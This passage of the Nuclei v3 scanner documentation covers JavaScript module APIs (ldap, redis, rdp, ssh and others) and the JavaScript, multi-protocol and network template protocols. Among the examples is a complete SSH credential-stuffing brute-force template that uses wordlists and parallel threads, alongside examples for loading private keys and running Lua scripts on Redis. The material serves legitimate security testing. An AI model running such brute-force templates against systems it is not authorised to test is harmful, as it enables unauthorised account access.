| :-------- | :---- |
| `filters` | `any` |
#### Returns
`string`
**`Example`**
```javascript
const ldap = require('nuclei/ldap');
const filter = ldap.JoinFilters(ldap.FilterIsPerson, ldap.FilterAccountEnabled);
```
#### Defined in
ldap.ts:140
***
### NegativeFilter
▸ **NegativeFilter**(`filter`): `string`
NegativeFilter returns a negative filter for a given filter
#### Parameters
| Name | Type |
| :------- | :------- |
| `filter` | `string` |
#### Returns
`string`
**`Example`**
```javascript
const ldap = require('nuclei/ldap');
const filter = ldap.NegativeFilter(ldap.FilterIsPerson);
```
#### Defined in
ldap.ts:154
# Namespace: mssql
## Table of contents
### Classes
* [MSSQLClient](/templates/protocols/javascript/modules/mssql.MSSQLClient)
# Namespace: mysql
## Table of contents
### Classes
* [MySQLClient](/templates/protocols/javascript/modules/mysql.MySQLClient)
### Interfaces
* [MySQLInfo](/templates/protocols/javascript/modules/mysql.MySQLInfo)
* [MySQLOptions](/templates/protocols/javascript/modules/mysql.MySQLOptions)
* [SQLResult](/templates/protocols/javascript/modules/mysql.SQLResult)
* [ServiceMySQL](/templates/protocols/javascript/modules/mysql.ServiceMySQL)
### Functions
* [BuildDSN](/templates/protocols/javascript/modules/mysql#builddsn)
## Functions
### BuildDSN
▸ **BuildDSN**(`opts`): `string` | `null`
BuildDSN builds a MySQL data source name (DSN) from the given options.
#### Parameters
| Name | Type |
| :----- | :--------------------------------------------------------------------------- |
| `opts` | [`MySQLOptions`](/templates/protocols/javascript/modules/mysql.MySQLOptions) |
#### Returns
`string` | `null`
**`Example`**
```javascript
const mysql = require('nuclei/mysql');
const options = new mysql.MySQLOptions();
options.Host = 'acme.com';
options.Port = 3306;
const dsn = mysql.BuildDSN(options);
```
#### Defined in
mysql.ts:14
# Namespace: net
## Table of contents
### Classes
* [NetConn](/templates/protocols/javascript/modules/net.NetConn)
### Functions
* [Open](/templates/protocols/javascript/modules/net#open)
* [OpenTLS](/templates/protocols/javascript/modules/net#opentls)
## Functions
### Open
▸ **Open**(`protocol`): [`NetConn`](/templates/protocols/javascript/modules/net.NetConn) | `null`
Open opens a new connection to the address with a timeout.
supported protocols: tcp, udp
#### Parameters
| Name | Type |
| :--------- | :------- |
| `protocol` | `string` |
| `address` | `string` |
#### Returns
[`NetConn`](/templates/protocols/javascript/modules/net.NetConn) | `null`
**`Example`**
```javascript
const net = require('nuclei/net');
const conn = net.Open('tcp', 'acme.com:80');
```
#### Defined in
net.ts:12
***
### OpenTLS
▸ **OpenTLS**(`protocol`): [`NetConn`](/templates/protocols/javascript/modules/net.NetConn) | `null`
OpenTLS opens a new TLS connection to the address with a timeout.
supported protocols: tcp, udp
#### Parameters
| Name | Type |
| :--------- | :------- |
| `protocol` | `string` |
| `address` | `string` |
#### Returns
[`NetConn`](/templates/protocols/javascript/modules/net.NetConn) | `null`
**`Example`**
```javascript
const net = require('nuclei/net');
const conn = net.OpenTLS('tcp', 'acme.com:443');
```
#### Defined in
net.ts:27
# Namespace: oracle
## Table of contents
### Interfaces
* [IsOracleResponse](/templates/protocols/javascript/modules/oracle.IsOracleResponse)
### Functions
* [IsOracle](/templates/protocols/javascript/modules/oracle#isoracle)
## Functions
### IsOracle
▸ **IsOracle**(`host`, `port`): [`IsOracleResponse`](/templates/protocols/javascript/modules/oracle.IsOracleResponse) | `null`
IsOracle checks if a host is running an Oracle server
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
[`IsOracleResponse`](/templates/protocols/javascript/modules/oracle.IsOracleResponse) | `null`
**`Example`**
```javascript
const oracle = require('nuclei/oracle');
const isOracle = oracle.IsOracle('acme.com', 1521);
log(toJSON(isOracle));
```
#### Defined in
oracle.ts:12
# Namespace: pop3
## Table of contents
### Interfaces
* [IsPOP3Response](/templates/protocols/javascript/modules/pop3.IsPOP3Response)
### Functions
* [IsPOP3](/templates/protocols/javascript/modules/pop3#ispop3)
## Functions
### IsPOP3
▸ **IsPOP3**(`host`, `port`): [`IsPOP3Response`](/templates/protocols/javascript/modules/pop3.IsPOP3Response) | `null`
IsPOP3 checks if a host is running a POP3 server.
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
[`IsPOP3Response`](/templates/protocols/javascript/modules/pop3.IsPOP3Response) | `null`
**`Example`**
```javascript
const pop3 = require('nuclei/pop3');
const isPOP3 = pop3.IsPOP3('acme.com', 110);
log(toJSON(isPOP3));
```
#### Defined in
pop3.ts:12
# Namespace: postgres
## Table of contents
### Classes
* [PGClient](/templates/protocols/javascript/modules/postgres.PGClient)
### Interfaces
* [SQLResult](/templates/protocols/javascript/modules/postgres.SQLResult)
# Namespace: rdp
## Table of contents
### Interfaces
* [CheckRDPAuthResponse](/templates/protocols/javascript/modules/rdp.CheckRDPAuthResponse)
* [IsRDPResponse](/templates/protocols/javascript/modules/rdp.IsRDPResponse)
* [ServiceRDP](/templates/protocols/javascript/modules/rdp.ServiceRDP)
### Functions
* [CheckRDPAuth](/templates/protocols/javascript/modules/rdp#checkrdpauth)
* [IsRDP](/templates/protocols/javascript/modules/rdp#isrdp)
## Functions
### CheckRDPAuth
▸ **CheckRDPAuth**(`host`, `port`): [`CheckRDPAuthResponse`](/templates/protocols/javascript/modules/rdp.CheckRDPAuthResponse) | `null`
CheckRDPAuth checks if the given host and port are running an RDP server
with authentication and returns its metadata.
If the connection is successful, it returns true.
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
[`CheckRDPAuthResponse`](/templates/protocols/javascript/modules/rdp.CheckRDPAuthResponse) | `null`
**`Example`**
```javascript
const rdp = require('nuclei/rdp');
const checkRDPAuth = rdp.CheckRDPAuth('acme.com', 3389);
log(toJSON(checkRDPAuth));
```
#### Defined in
rdp.ts:14
***
### IsRDP
▸ **IsRDP**(`host`, `port`): [`IsRDPResponse`](/templates/protocols/javascript/modules/rdp.IsRDPResponse) | `null`
IsRDP checks if the given host and port are running an RDP server.
If the connection is successful, it returns true.
If the connection is unsuccessful, it returns false and an error.
The name of the OS is also returned if the connection is successful.
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
[`IsRDPResponse`](/templates/protocols/javascript/modules/rdp.IsRDPResponse) | `null`
**`Example`**
```javascript
const rdp = require('nuclei/rdp');
const isRDP = rdp.IsRDP('acme.com', 3389);
log(toJSON(isRDP));
```
#### Defined in
rdp.ts:32
# Namespace: redis
## Table of contents
### Functions
* [Connect](/templates/protocols/javascript/modules/redis#connect)
* [GetServerInfo](/templates/protocols/javascript/modules/redis#getserverinfo)
* [GetServerInfoAuth](/templates/protocols/javascript/modules/redis#getserverinfoauth)
* [IsAuthenticated](/templates/protocols/javascript/modules/redis#isauthenticated)
* [RunLuaScript](/templates/protocols/javascript/modules/redis#runluascript)
## Functions
### Connect
▸ **Connect**(`host`, `port`, `password`): `boolean` | `null`
Connect tries to connect to a Redis server with the given password.
#### Parameters
| Name | Type |
| :--------- | :------- |
| `host` | `string` |
| `port` | `number` |
| `password` | `string` |
#### Returns
`boolean` | `null`
**`Example`**
```javascript
const redis = require('nuclei/redis');
const connected = redis.Connect('acme.com', 6379, 'password');
```
#### Defined in
redis.ts:11
***
### GetServerInfo
▸ **GetServerInfo**(`host`, `port`): `string` | `null`
GetServerInfo returns the server info for a Redis server.
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
`string` | `null`
**`Example`**
```javascript
const redis = require('nuclei/redis');
const info = redis.GetServerInfo('acme.com', 6379);
```
#### Defined in
redis.ts:25
***
### GetServerInfoAuth
▸ **GetServerInfoAuth**(`host`, `port`, `password`): `string` | `null`
GetServerInfoAuth returns the server info for a password-protected Redis server.
#### Parameters
| Name | Type |
| :--------- | :------- |
| `host` | `string` |
| `port` | `number` |
| `password` | `string` |
#### Returns
`string` | `null`
**`Example`**
```javascript
const redis = require('nuclei/redis');
const info = redis.GetServerInfoAuth('acme.com', 6379, 'password');
```
#### Defined in
redis.ts:39
***
### IsAuthenticated
▸ **IsAuthenticated**(`host`, `port`): `boolean` | `null`
IsAuthenticated checks if the Redis server requires authentication.
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
`boolean` | `null`
**`Example`**
```javascript
const redis = require('nuclei/redis');
const isAuthenticated = redis.IsAuthenticated('acme.com', 6379);
```
#### Defined in
redis.ts:53
***
### RunLuaScript
▸ **RunLuaScript**(`host`, `port`, `password`, `script`): `any` | `null`
RunLuaScript runs a Lua script on the Redis server.
#### Parameters
| Name | Type |
| :--------- | :------- |
| `host` | `string` |
| `port` | `number` |
| `password` | `string` |
| `script` | `string` |
#### Returns
`any` | `null`
**`Example`**
```javascript
const redis = require('nuclei/redis');
const result = redis.RunLuaScript('acme.com', 6379, 'password', 'return redis.call("get", KEYS[1])');
```
#### Defined in
redis.ts:67
# Namespace: rsync
## Table of contents
### Interfaces
* [IsRsyncResponse](/templates/protocols/javascript/modules/rsync.IsRsyncResponse)
### Functions
* [IsRsync](/templates/protocols/javascript/modules/rsync#isrsync)
## Functions
### IsRsync
▸ **IsRsync**(`host`, `port`): [`IsRsyncResponse`](/templates/protocols/javascript/modules/rsync.IsRsyncResponse) | `null`
IsRsync checks if a host is running an Rsync server.
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
[`IsRsyncResponse`](/templates/protocols/javascript/modules/rsync.IsRsyncResponse) | `null`
**`Example`**
```javascript
const rsync = require('nuclei/rsync');
const isRsync = rsync.IsRsync('acme.com', 873);
log(toJSON(isRsync));
```
#### Defined in
rsync.ts:12
# Namespace: smb
## Table of contents
### Classes
* [SMBClient](/templates/protocols/javascript/modules/smb.SMBClient)
### Interfaces
* [HeaderLog](/templates/protocols/javascript/modules/smb.HeaderLog)
* [NegotiationLog](/templates/protocols/javascript/modules/smb.NegotiationLog)
* [SMBCapabilities](/templates/protocols/javascript/modules/smb.SMBCapabilities)
* [SMBLog](/templates/protocols/javascript/modules/smb.SMBLog)
* [SMBVersions](/templates/protocols/javascript/modules/smb.SMBVersions)
* [ServiceSMB](/templates/protocols/javascript/modules/smb.ServiceSMB)
* [SessionSetupLog](/templates/protocols/javascript/modules/smb.SessionSetupLog)
# Namespace: smtp
## Table of contents
### Classes
* [Client](/templates/protocols/javascript/modules/smtp.Client)
* [SMTPMessage](/templates/protocols/javascript/modules/smtp.SMTPMessage)
### Interfaces
* [SMTPResponse](/templates/protocols/javascript/modules/smtp.SMTPResponse)
# Namespace: ssh
## Table of contents
### Classes
* [SSHClient](/templates/protocols/javascript/modules/ssh.SSHClient)
### Interfaces
* [Algorithms](/templates/protocols/javascript/modules/ssh.Algorithms)
* [DirectionAlgorithms](/templates/protocols/javascript/modules/ssh.DirectionAlgorithms)
* [EndpointId](/templates/protocols/javascript/modules/ssh.EndpointId)
* [HandshakeLog](/templates/protocols/javascript/modules/ssh.HandshakeLog)
* [KexInitMsg](/templates/protocols/javascript/modules/ssh.KexInitMsg)
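The ssh namespace is likewise class-based: templates instantiate `SSHClient` and call its methods. As a quick reference, here is a minimal fingerprinting sketch mirroring the `ssh-server-fingerprint` template shown in the JavaScript Protocol section later in this document:
```yaml
javascript:
  - code: |
      // connect in non-auth (info) mode and emit the handshake metadata;
      // this mirrors the ssh-server-fingerprint example below
      var m = require("nuclei/ssh");
      var c = m.SSHClient();
      var response = c.ConnectSSHInfoMode(Host, Port);
      to_json(response);
    args:
      Host: "{{Host}}"
      Port: "22"
```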
# Namespace: structs
## Table of contents
### Functions
* [Pack](/templates/protocols/javascript/modules/structs#pack)
* [StructsCalcSize](/templates/protocols/javascript/modules/structs#structscalcsize)
* [Unpack](/templates/protocols/javascript/modules/structs#unpack)
## Functions
### Pack
▸ **Pack**(`formatStr`, `msg`): `Uint8Array` | `null`
StructsPack returns a byte slice containing the values of the msg slice packed according to the given format.
The items of the msg slice must match the values required by the format exactly.
Ex: structs.Pack("H", [0])
#### Parameters
| Name | Type |
| :---------- | :------- |
| `formatStr` | `string` |
| `msg` | `any` |
#### Returns
`Uint8Array` | `null`
**`Example`**
```javascript
const structs = require('nuclei/structs');
const packed = structs.Pack('H', [0]);
```
#### Defined in
structs.ts:13
***
### StructsCalcSize
▸ **StructsCalcSize**(`format`): `number` | `null`
StructsCalcSize returns the number of bytes needed to pack the values according to the given format.
Ex: structs.CalcSize("H")
#### Parameters
| Name | Type |
| :------- | :------- |
| `format` | `string` |
#### Returns
`number` | `null`
**`Example`**
```javascript
const structs = require('nuclei/structs');
const size = structs.CalcSize('H');
```
#### Defined in
structs.ts:28
***
### Unpack
▸ **Unpack**(`format`, `msg`): `any` | `null`
StructsUnpack unpacks the byte slice (presumably packed by Pack(format, msg)) according to the given format.
The result is a \[]interface{} slice even if it contains exactly one item.
The byte slice must contain at least the amount of data required by the format
(len(msg) must be greater than or equal to CalcSize(format)).
Ex: structs.Unpack(">I", buff\[:nb])
#### Parameters
| Name | Type |
| :------- | :----------- |
| `format` | `string` |
| `msg` | `Uint8Array` |
#### Returns
`any` | `null`
**`Example`**
```javascript
const structs = require('nuclei/structs');
const result = structs.Unpack('H', [0]);
```
#### Defined in
structs.ts:46
# Namespace: telnet
## Table of contents
### Interfaces
* [IsTelnetResponse](/templates/protocols/javascript/modules/telnet.IsTelnetResponse)
### Functions
* [IsTelnet](/templates/protocols/javascript/modules/telnet#istelnet)
## Functions
### IsTelnet
▸ **IsTelnet**(`host`, `port`): [`IsTelnetResponse`](/templates/protocols/javascript/modules/telnet.IsTelnetResponse) | `null`
IsTelnet checks if a host is running a Telnet server.
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
[`IsTelnetResponse`](/templates/protocols/javascript/modules/telnet.IsTelnetResponse) | `null`
**`Example`**
```javascript
const telnet = require('nuclei/telnet');
const isTelnet = telnet.IsTelnet('acme.com', 23);
log(toJSON(isTelnet));
```
#### Defined in
telnet.ts:12
# Namespace: vnc
## Table of contents
### Interfaces
* [IsVNCResponse](/templates/protocols/javascript/modules/vnc.IsVNCResponse)
### Functions
* [IsVNC](/templates/protocols/javascript/modules/vnc#isvnc)
## Functions
### IsVNC
▸ **IsVNC**(`host`, `port`): [`IsVNCResponse`](/templates/protocols/javascript/modules/vnc.IsVNCResponse) | `null`
IsVNC checks if a host is running a VNC server.
It returns a boolean indicating if the host is running a VNC server
and the banner of the VNC server.
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
[`IsVNCResponse`](/templates/protocols/javascript/modules/vnc.IsVNCResponse) | `null`
**`Example`**
```javascript
const vnc = require('nuclei/vnc');
const isVNC = vnc.IsVNC('acme.com', 5900);
log(toJSON(isVNC));
```
#### Defined in
vnc.ts:14
# JavaScript Protocol
Review examples of JavaScript with Nuclei v3
The JavaScript protocol was added to Nuclei v3 to allow you to write checks and detections for exploits in JavaScript and to bridge the gap between network protocols.
* Internally any content written using the JavaScript protocol is executed in Golang.
* The JavaScript protocol is **not** intended to fit into or be imported with any existing JavaScript libraries or frameworks outside of the Nuclei ecosystem.
* Nuclei provides a set of functions and libraries that are tailor-made for writing exploits and checks, and only adds the required/necessary functionality to complement the existing YAML-based DSL.
* The JavaScript protocol is **not** intended to be used as a general purpose JavaScript runtime and does not replace matchers, extractors, or any existing functionality of Nuclei.
* Nuclei v3.0.0 ships with **15+ libraries (ssh, ftp, RDP, Kerberos, and Redis)** tailored for writing exploits and checks in JavaScript and will be continuously expanded in the future.
## Simple Example
Here is a basic example of a JavaScript protocol template:
```yaml
id: ssh-server-fingerprint

info:
  name: Fingerprint SSH Server Software
  author: Ice3man543,tarunKoyalwar
  severity: info

javascript:
  - code: |
      var m = require("nuclei/ssh");
      var c = m.SSHClient();
      var response = c.ConnectSSHInfoMode(Host, Port);
      to_json(response);
    args:
      Host: "{{Host}}"
      Port: "22"

    extractors:
      - type: json
        json:
          - '.ServerID.Raw'
```
In the Nuclei template example above, we are fingerprinting SSH server software by connecting in non-auth mode and extracting the server banner. Let's break down the template.
### Code Section
The `code:` contains actual JavaScript code that is executed by Nuclei at runtime. In the above template, we are:
* Importing `nuclei/ssh` module/library
* Creating a new instance of `SSHClient` object
* Connecting to SSH server in `Info` mode
* Converting response to json
### Args Section
The `args:` section can be simply understood as variables in JavaScript that are passed at runtime and support DSL usage.
### Output Section
The value of the last expression is returned as the output of the JavaScript protocol template and can be used in matchers and extractors. If the server returns an error instead, the `error` variable is exposed to the matchers or extractors with the error message.
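For example, since the `to_json(response)` expression above is the template output, a DSL matcher can be applied to it directly. A sketch (the banner string is illustrative):
```yaml
matchers:
  - type: dsl
    dsl:
      # 'success' reflects whether the code block executed without error;
      # 'response' holds the value of the last expression
      - "success == true"
      - "contains(response, 'SSH-2.0')" # illustrative banner check
    condition: and
```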
## SSH Bruteforce Example
**SSH Password Bruteforce Template**
```yaml
id: ssh-brute

info:
  name: SSH Credential Stuffing
  author: tarunKoyalwar
  severity: critical

javascript:
  - pre-condition: |
      var m = require("nuclei/ssh");
      var c = m.SSHClient();
      var response = c.ConnectSSHInfoMode(Host, Port);
      // only bruteforce if ssh server allows password based authentication
      response["UserAuth"].includes("password")

    code: |
      var m = require("nuclei/ssh");
      var c = m.SSHClient();
      c.Connect(Host,Port,Username,Password);

    args:
      Host: "{{Host}}"
      Port: "22"
      Username: "{{usernames}}"
      Password: "{{passwords}}"

    threads: 10
    attack: clusterbomb
    payloads:
      usernames: helpers/wordlists/wp-users.txt
      passwords: helpers/wordlists/wp-passwords.txt
    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - "response == true"
          - "success == true"
        condition: and
```
In the example template above, we are brute-forcing the SSH server with a list of usernames and passwords. This would have been difficult to achieve with the network template. Let's break down the template.
### Pre-Condition
`pre-condition` is an optional section of JavaScript code that is executed before running `code` and acts as a pre-condition for the exploit. In the above template, before attempting brute force, we check if:
* The address is actually an SSH server.
* The ssh server is configured to allow password-based authentication.
**Further explanation**
* `code` is executed only if the pre-condition returns `true`; otherwise, it is skipped.
* In the code section, we import `nuclei/ssh` module and create a new instance of `SSHClient` object.
* Then we attempt to connect to the ssh server with a username and password.
This template uses [payloads](https://docs.projectdiscovery.io/templates/protocols/http/http-payloads) to launch a clusterbomb attack with 10 threads and exits on the first match.
Looking at this template now, we can tell that JavaScript templates are powerful for writing multistep and protocol/vendor-specific exploits, which is a primary goal of the JavaScript protocol.
## Init
`init` is an optional JavaScript section that can be used to initialize the template, and it is executed just after compiling the template and before running it on any target. Although it is rarely needed, it can be used to load and preprocess data before running a template on any target.
For example, in the code block below, we load all SSH private keys from the `nuclei-templates/helpers` directory and store them in payloads under the name `keys`. If we were loading private keys from the "pre-condition" code block instead, they would have been loaded for every target, which is not ideal.
```yaml
variables:
  keysDir: "helpers/" # load all private keys from this directory

javascript:
  # the init field can be used to make any preparations before the actual exploit
  # here we are reading all private keys from the helpers folder and storing them in a list
  - init: |
      let m = require('nuclei/fs');
      let privatekeys = m.ReadFilesFromDir(keysDir)
      updatePayload('keys',privatekeys)

    payloads:
      # 'keys' will be updated with actual private keys after init is executed
      keys:
        - key1
        - key2
```
Two special functions that are available in the `init` block are
| Function | Description |
| -------------------------- | ---------------------------------------- |
| `updatePayload(key,value)` | updates payload with given key and value |
| `set(key,value)` | sets a variable with given key and value |
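As a sketch, `set` works the same way for plain variables; the variable name `nonce` below is illustrative (`Rand` and `ToString` are from the JS runtime helpers documented later in this reference):
```yaml
javascript:
  - init: |
      // compute a value once, when the template is compiled, and expose it
      // to the rest of the template as the variable 'nonce'
      set('nonce', ToString(Rand(16)))
```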
A collection of JavaScript protocol templates can be found [here](https://github.com/projectdiscovery/nuclei-templates/pull/8530).
# Multi-protocol
Learn about multi-protocol support in Nuclei v3
Nuclei provides support for a variety of protocols including HTTP, DNS, Network, SSL, and Code. This allows users to write Nuclei templates for vulnerabilities across these protocols. However, there may be instances where a vulnerability requires the synchronous execution of multiple protocols for testing or exploitation. A prime example of this is **subdomain takeovers**, which necessitate a check for the CNAME record of a subdomain, followed by a verification of a string in the HTTP response. While this was partially achievable with workflows in Nuclei, the introduction of **Nuclei v3.0** has made it possible to conveniently write a **template** that can execute multiple protocols synchronously. This allows for checks to be performed on the results of each protocol, along with other enhancements.
**Example:**
```yaml
id: dns-http-template

info:
  name: dns + http takeover template
  author: pdteam
  severity: info

dns:
  - name: "{{FQDN}}" # dns request
    type: cname

http:
  - method: GET # http request
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - contains(http_body,'Domain not found') # check for string from http response
          - contains(dns_cname, 'github.io') # check for cname from dns response
        condition: and
```
The example above demonstrates that there is no need for new logic or syntax. Simply write the logic for each protocol and then use the protocol-prefixed variable or the [dynamic extractor](https://docs.projectdiscovery.io/templates/reference/extractors#dynamic-extractor) to export that variable. This variable is then shared across all protocols. We refer to this as the **Template Context**, which contains all variables that are scoped at the template level.
## Features
The following features enhance the power of multi-protocol execution:
* Protocol-Scoped Shared Variables Across Protocols
* Data Export across Protocols using Dynamic Extractor
### Protocol Scoped Variables
In the previous example, we demonstrated how to export the DNS CNAME and use it in an HTTP request. However, you might encounter a scenario where a template includes more than four protocols, and you need to export various response fields such as `subject_dn`, `ns`, `cname`, `header`, and so on. While you could achieve this by adding more dynamic extractors, this approach could clutter the template and introduce redundant logic, making it difficult to track and maintain all the variables.
To address this issue, multi-protocol execution supports template-scoped protocol responses. This means that all response fields from all protocols in a template are available in the template context with a protocol prefix.
Here's an example to illustrate this:
| Protocol | Response Field | Exported Variable |
| -------- | -------------- | ----------------- |
| ssl | subject\_cn | ssl\_subject\_cn |
| dns | cname | dns\_cname |
| http | header | http\_header |
| code | response | code\_response |
This is just an example, but it's important to note that the response fields of all protocols used in a multi-protocol template are exported.
**Example:**
```yaml
id: dns-ssl-http-proto-prefix

info:
  name: multi protocol request with response fields
  author: pdteam
  severity: info

dns:
  - name: "{{FQDN}}" # DNS Request
    type: cname

ssl:
  - address: "{{Hostname}}" # ssl request

http:
  - method: GET # http request
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - contains(http_body,'ProjectDiscovery.io') # check for http string
          - trim_suffix(dns_cname,'.ghost.io.') == 'projectdiscovery' # check for cname (extracted information from dns response)
          - ssl_subject_cn == 'blog.projectdiscovery.io'
        condition: and
```
To list all exported response fields, write a multi-protocol template and run it with the `-v -svd` flags; all exported response fields will be printed.
Example:
```bash
nuclei -t multi-protocol-template.yaml -u scanme.sh -debug -svd
```
### Data Export across Protocols
If you are unfamiliar with dynamic extractors, we recommend reading the [dynamic extractor](https://docs.projectdiscovery.io/templates/reference/extractors#dynamic-extractor) section first.
Previously, Dynamic Extractors were only supported for specific protocols or workflows. However, with multi-protocol execution, dynamically extracted values are stored in the template context and can be used across all protocols.
**Example:**
```yaml
id: dns-http-template

info:
  name: dns + http takeover template
  author: pdteam
  severity: info

dns:
  - name: "{{FQDN}}" # dns request
    type: cname

    extractors:
      - type: dsl
        name: exported_cname
        dsl:
          - cname
        internal: true

http:
  - method: GET # http request
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - contains(body,'Domain not found') # check for http string
          - contains(exported_cname, 'github.io') # check for cname (extracted information from dns response)
        condition: and
```
## How Multi-Protocol Execution Works
At this point, we have seen what multi-protocol templates look like and the features they bring to the table. Now let's look at how multi-protocol templates work and what to keep in mind while writing them.
* Multi-protocol templates are executed in the order the protocols are defined in the template.
* Protocols in multi-protocol templates are executed serially, i.e., one after another.
* Response fields of a protocol are exported to the template context as soon as that protocol is executed.
* Variables are scoped at the template level and evaluated after each protocol execution.
* Multi-protocol brings limited indirect support for preprocessing (using variables) and postprocessing (using dynamic extractors) for protocols.
## FAQ
**What Protocols are supported in Multi-Protocol Execution Mode?**
> There is no restriction: any protocol available/implemented in the Nuclei engine can be used in multi-protocol templates.
**How many protocols can be used in Multi-Protocol Execution Mode?**
> There is no restriction on the number of protocols, but duplicated protocols are currently not supported, i.e., dns -> http -> ssl -> http. Please open an issue if you have a vulnerability/use case that requires duplicated protocols.
**What happens if a protocol fails?**
> Multi-protocol execution follows an exit-on-error policy, i.e., if a protocol fails to execute, the remaining protocols are skipped and template execution stops.
**How is multi protocol execution different from workflows?**
> A workflow, as the name suggests, executes templates based on a workflow file.
>
> * A workflow does not contain the actual logic of a vulnerability; it just orchestrates the execution of different templates
> * A workflow supports conditional execution of multiple templates
> * A workflow has limited support for variables and dynamic extractors
To summarize, a workflow is a step above a template and manages the execution of templates based on a workflow file.
**Is multi protocol execution supported in nuclei v2?**
> No, multi-protocol execution is only supported in Nuclei v3 and above.
# Network Protocol
Learn about network requests with Nuclei
Nuclei can act as an automatable **Netcat**, allowing users to send bytes across the wire and receive them, while providing matching and extracting capabilities on the response.
Network Requests start with a **network** block which specifies the start of the requests for the template.
```yaml
# Start the requests for the template right here
tcp:
```
### Inputs
The first thing in the request is **inputs**: the data that will be sent to the server, and optionally any data to read from the server.
At its most simple, just specify a string, and it will be sent across the network socket.
```yaml
# inputs is the list of inputs to send to the server
inputs:
  - data: "TEST\r\n"
```
You can also send hex-encoded text, which will first be decoded; the raw bytes are then sent to the server.
```yaml
inputs:
  - data: "50494e47"
    type: hex
  - data: "\r\n"
```
Helper function expressions can also be defined in the input; they will first be evaluated and then sent to the server. The last hex-encoded example can be sent with helper functions this way:
```yaml
inputs:
- data: 'hex_decode("50494e47")\r\n'
```
One last thing that can be done with inputs is reading data from the socket. Specifying `read-size` with a non-zero value will do the trick. You can also assign the read data a name, so matching can be done on that part.
```yaml
inputs:
  - read-size: 8
```
An example that reads a number of bytes and matches only on them:
```yaml
inputs:
  - read-size: 8
    name: prefix
...
matchers:
  - type: word
    part: prefix
    words:
      - "CAFEBABE"
```
Multiple steps can be chained together in sequence to do network reading / writing.
### Host
The next part of the request is the **host** to connect to. Dynamic variables can be placed in the host to modify its value at runtime. Variables start with `{{` and end with `}}` and are case-sensitive.
1. **Hostname** - variable is replaced by the hostname provided on the command line.
An example host value:
```yaml
host:
  - "{{Hostname}}"
```
Nuclei can also make a TLS connection to the target server. Just add `tls://` as a prefix before the **Hostname** and you're good to go.
```yaml
host:
  - "tls://{{Hostname}}"
```
If a port is specified in the host, the user supplied port is ignored and the template port takes precedence.
### Port
Starting from Nuclei v2.9.15, a new field called `port` has been introduced in network templates. This field allows users to specify the port separately instead of including it in the host field.
Previously, if you wanted to write a network template for an exploit targeting SSH, you would have to specify both the hostname and the port in the host field, like this:
```yaml
host:
  - "{{Hostname}}"
  - "{{Host}}:22"
```
In the above example, two network requests are sent: one to the port specified in the input/target, and another to the default SSH port (22).
The reason behind introducing the port field is to provide users with more flexibility when running network templates on both default and non-default ports. For example, if a user knows that the SSH service is running on a non-default port of 2222 (after performing a port scan with service discovery), they can simply run:
```bash
$ nuclei -u scanme.sh:2222 -id xyz-ssh-exploit
```
In this case, Nuclei will use port 2222 instead of the default port 22. If the user doesn't specify any port in the input, port 22 will be used by default. However, this approach may not be straightforward to understand and can generate warnings in logs since one request is expected to fail.
Another issue with the previous design of writing network templates is that requests can be sent to unexpected ports. For example, if a web service is running on port 8443 and the user runs:
```bash
$ nuclei -u scanme.sh:8443
```
In this case, the `xyz-ssh-exploit` template will send one request to `scanme.sh:22` and another request to `scanme.sh:8443`, which may return unexpected responses and eventually result in errors. This is particularly problematic in automation scenarios.
To address these issues while maintaining the existing functionality, network templates can now be written in the following way:
```yaml
host:
  - "{{Hostname}}"
port: 22
```
In this new design, the functionality to run templates on non-standard ports still exists, except for the default reserved ports (`80`, `443`, `8080`, `8443`, `8081`, `53`). Additionally, the list of default reserved ports can be customized by adding a new field called `exclude-ports`:
```yaml
exclude-ports: 80,443
```
When `exclude-ports` is used, the default reserved ports list will be overwritten. This means that if you want to run a network template on port `80`, you will have to explicitly specify it in the port field.
Starting from Nuclei v3.1.0, the `port` field supports comma-separated values, so multiple ports can be specified. For example, if you want to run a network template on ports `5432` and `5433`, you can specify them in the port field like this:
```yaml
port: 5432,5433
```
In this case, Nuclei will first check which of the listed ports are open and run the template only on those open ports.
#### Matchers / Extractor Parts
Valid `part` values supported by the **Network** protocol for matchers / extractors are:
| Value | Description |
| ---------------- | ----------------------------------- |
| request | Network Request |
| data | Final Data Read From Network Socket |
| raw / body / all | All Data received from Socket |
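For instance, to match only on the bytes read back from the socket rather than on the request that was sent, target the `data` part; the banner below is illustrative:
```yaml
matchers:
  - type: word
    part: data # match only on data read from the network socket
    words:
      - "SSH-2.0" # illustrative banner
```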
### **Example Network Template**
The final example template, which uses a `hex`-encoded input to detect MongoDB running on a server, complete with working matchers, is provided below.
```yaml
id: input-expressions-mongodb-detect

info:
  name: Input Expression MongoDB Detection
  author: pdteam
  severity: info
  reference: https://github.com/orleven/Tentacle

tcp:
  - inputs:
      - data: "{{hex_decode('3a000000a741000000000000d40700000000000061646d696e2e24636d640000000000ffffffff130000001069736d6173746572000100000000')}}"
    host:
      - "{{Hostname}}"
    port: 27017
    read-size: 2048
    matchers:
      - type: word
        words:
          - "logicalSessionTimeout"
          - "localTime"
```
More complete examples are provided [here](/templates/protocols/network-examples).
# Extractors
Review details on extractors for Nuclei
Extractors can be used to extract a match from the response returned by a module and display it in the results.
### Types
Multiple extractors can be specified in a request. As of now, we support five types of extractors.
1. **regex** - Extract data from response based on a Regular Expression.
2. **kval** - Extract `key: value`/`key=value` formatted data from Response Header/Cookie
3. **json** - Extract data from JSON based response in JQ like syntax.
4. **xpath** - Extract xpath based data from HTML Response
5. **dsl** - Extract data from the response based on DSL expressions.
### Regex Extractor
Example extractor for HTTP Response body using **regex** -
